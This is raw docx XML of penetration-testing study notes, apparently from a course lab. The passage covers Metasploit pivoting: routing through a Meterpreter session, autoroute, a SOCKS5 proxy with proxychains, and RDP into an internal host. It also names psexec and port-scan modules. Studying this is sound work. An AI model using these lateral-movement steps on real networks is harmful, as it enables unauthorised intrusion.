    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route add 172.16.5.0/24 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12 is the session ID of the Meterpreter session that has access to the target network 172.16.5.0/24. You're telling Metasploit to route packets destined for that subnet through session 12.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What this does is it tells Metasploit that we can access the 172 subnet through session 12, which means it adds routes to Metasploit’s routing table. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without route add: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you tried to run a Metasploit auxiliary module (like a port scanner or SMB enum module) with RHOSTS=172.16.5.200, Metasploit would try to connect to that IP directly from your attack machine (e.g., Kali). But your Kali box is on the 192.168.119.x or 192.168.50.x subnet and cannot reach the 172.16.5.x network directly — the packets would go nowhere.</w:t>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t xml:space="preserve">With a path created to the internal network, we can enumerate this subnet. Now we could scan the whole network for live hosts with a port scan auxiliary module. Since this scan would take quite some time to complete, let's shorten this step by only scanning the other live host in the second network. Therefore, instead of setting the value of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we would do if we wanted to scan the whole network, we set it to 172.16.5.200. For now, we only want to scan ports 445 and 3389.</w:t>
      </w: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t xml:space="preserve">They proceeded to use tools like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route flush</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to remove all routes from metasploit's routing table, and run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to confirm everything is gone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5wnzbishiejg" w:id="98"/>
      <w:bookmarkEnd w:id="98"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute</w:t>
      </w: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t xml:space="preserve">Instead of manually adding subnets to Metasploit routing table, you can instead use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">module to automatically scan for ALL the subnets that the victim machine is in (the machine that meterpreter is in). </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Next, let's activate the module multi/manage/autoroute in which we must set the session ID as value for the option SESSION. Then, let's enter run to launch the module.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5369320" cy="6367463"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="534" name="image533.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image533.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId244"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5369320" cy="6367463"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:ind w:left="72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B76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set session 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means the compromised machine is on session 12, the one on the 172 subnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</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t xml:space="preserve">Listing 80 shows that autoroute added </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the routing table (as well as the 192 subnet since the compromised machine is dual-homed)</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fh6gn0ayqpx9" w:id="99"/>
      <w:bookmarkEnd w:id="99"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SOCKS proxy in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that we can use SOCKS proxy along with either the "Route Add" method or the "multi/manage/autoroute" method, since they both do the same job of adding to Metasploit's Routing Table, which allow tools like SOCKS5 in Metasploit to be usable</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could now use the psexec module as we did before,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but we can also combine routes with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server/socks_proxy auxiliary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">module to configure a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows applications outside of the Metasploit Framework to tunnel through the pivot on port 1080 by default.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We set the option SRVHOST to 127.0.0.1 and VERSION to 5 in order to use SOCKS version 5.</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rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4510144" cy="4300538"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId245"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4510144"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B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/server/socks_proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="72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B87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set SRVHOST 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set VERSION 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This specifies using SOCKS5 as the version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the -j flag means "run the module as a background job."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now update our proxychains configuration file (/etc/proxychains4.conf) to take advantage of the SOCKS5 proxy.</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After editing the configuration file, it should appear as follows:</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="144" name="image138.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image138.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="853"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail /etc/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="853"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B94">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B95">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain GUI access from our Kali Linux system to the target machine on the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B96">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B97">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3797300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="352" name="image344.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image344.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1173"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
